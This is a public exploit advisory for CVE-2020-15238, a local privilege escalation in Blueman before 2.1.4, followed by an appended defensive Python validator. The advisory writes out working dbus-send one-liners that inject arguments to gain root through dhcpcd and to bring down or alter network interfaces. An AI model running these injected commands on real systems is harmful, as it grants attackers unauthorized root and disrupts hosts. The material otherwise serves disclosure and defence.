## https://sploitus.com/exploit?id=PACKETSTORM:159740
# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4  
# Date: 2020-10-27  
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)  
# Vendor Homepage: https://github.com/blueman-project/blueman  
# Software Link: https://github.com/blueman-project/blueman  
# Version: < 2.1.4  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2020-15238  
#  
# By default installed on Ubuntu 16.04 - 20.10 and  
# Debian 9 - 11  
#  
# Local root exploit when dhcpcd is used instead of dhclient  
#   
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html  
#  
#   
# The DhcpClient method of the D-Bus interface to blueman-mechanism   
# is prone to an argument injection vulnerability.   
# On systems where the isc-dhcp-client package is removed   
# and the dhcpcd package installed, this leads to Local   
# Privilege Escalation to root from any unprivileged user.   
# See the attached Python script for a working exploit, or use   
# this one-liner with a shell script at "/tmp/eye":  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"-c/tmp/eye"  
  
# This happens because the argument is not sanitized before   
# being used as an argument to dhcpcd.  
#   
# Also on default installations with isc-dhcp-client installed,   
# this can lead to DoS attacks by bringing any interface down   
# as follows:  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 down al"  
  
# Or allows users to attach XDP objects to an interface:  
  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 down al"  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"ens33 name a"  
dbus-send --print-reply --system --dest=org.blueman.Mechanism \  
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \  
string:"a xdp o /tmp/o"  
  
# Both of these happen because the argument is passed to "ip link"   
# unsanitized.
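The root cause named twice above (the caller-supplied string reaches dhcpcd and "ip link" without any check) is what a privileged D-Bus helper has to prevent with an allow-list. The following is an added example written for this page; it is not the advisory's attached script and not code from the blueman project, and it does not claim to reproduce the upstream 2.1.4 fix. It assumes the helper only ever needs a bare interface name, enforces the Linux naming rules (at most 15 characters, no '/', no whitespace, not "." or ".."), refuses anything that starts with '-' so the value can never be read as an option, and requires the name to be present on the system (or in a caller-supplied set, used here so the example runs offline). The rejected inputs are the ones quoted in this advisory.

```python
"""Added example (not from the advisory or the blueman project): an
allow-list validator for a caller-supplied network interface name, the
check a privileged D-Bus helper must apply before forwarding the string
to dhcpcd or "ip link".  The sample inputs are constructed from the
strings quoted in the advisory above."""
import os
import re
from typing import Iterable, List, Optional

# Kernel rules (IFNAMSIZ = 16 including the NUL): 1..15 bytes, no '/',
# no whitespace, not "." or "..".  The character class below is a
# deliberately narrow allow-list (letters, digits, '_', '.', ':', '@', '-')
# that still admits aliases such as "eth0:1" and VLANs such as "eth0.100".
_IFACE_RE = re.compile(r"^[A-Za-z0-9_.:@-]{1,15}$")


def validate_interface_name(name: str,
                            existing: Optional[Iterable[str]] = None) -> bool:
    """Return True only if `name` is a syntactically valid interface name
    that is also present on the system (or in the supplied set)."""
    if not isinstance(name, str) or not _IFACE_RE.fullmatch(name):
        return False
    # A leading '-' would be parsed as an option by dhcpcd or ip; "." and
    # ".." are rejected by the kernel as well.
    if name.startswith("-") or name in (".", ".."):
        return False
    if existing is None:
        # Assumed default when no set is given: enumerate real interfaces
        # from sysfs (Linux only).
        existing = os.listdir("/sys/class/net")
    return name in set(existing)


def dhcp_client_command(arg: str,
                        existing: Optional[Iterable[str]] = None) -> List[str]:
    """Build the argv a hardened helper would execute.

    The vulnerable pattern the advisory describes is forwarding `arg`
    unchanged; this version raises instead of running anything when the
    argument is not a known interface name."""
    if not validate_interface_name(arg, existing):
        raise ValueError(f"refusing to act on non-interface argument: {arg!r}")
    # Keep argv as a list (no shell) so the name stays one positional
    # argument even after validation.
    return ["dhcpcd", arg]


if __name__ == "__main__":
    # Constructed set of interfaces standing in for /sys/class/net.
    known = {"lo", "ens33", "wlan0"}
    for candidate in ("ens33", "-c/tmp/eye", "ens33 down al",
                      "ens33 name a", "a xdp o /tmp/o", "eth0"):
        print(f"{candidate!r:>20}: {validate_interface_name(candidate, known)}")
```

The same validator applies to the "ip link" path: the helper should construct the full argv itself ("ip", "link", "set", name, "up") around a validated name, never accept a free-form string from the bus, and the D-Bus policy for the method should in any case restrict callers to the intended user or group.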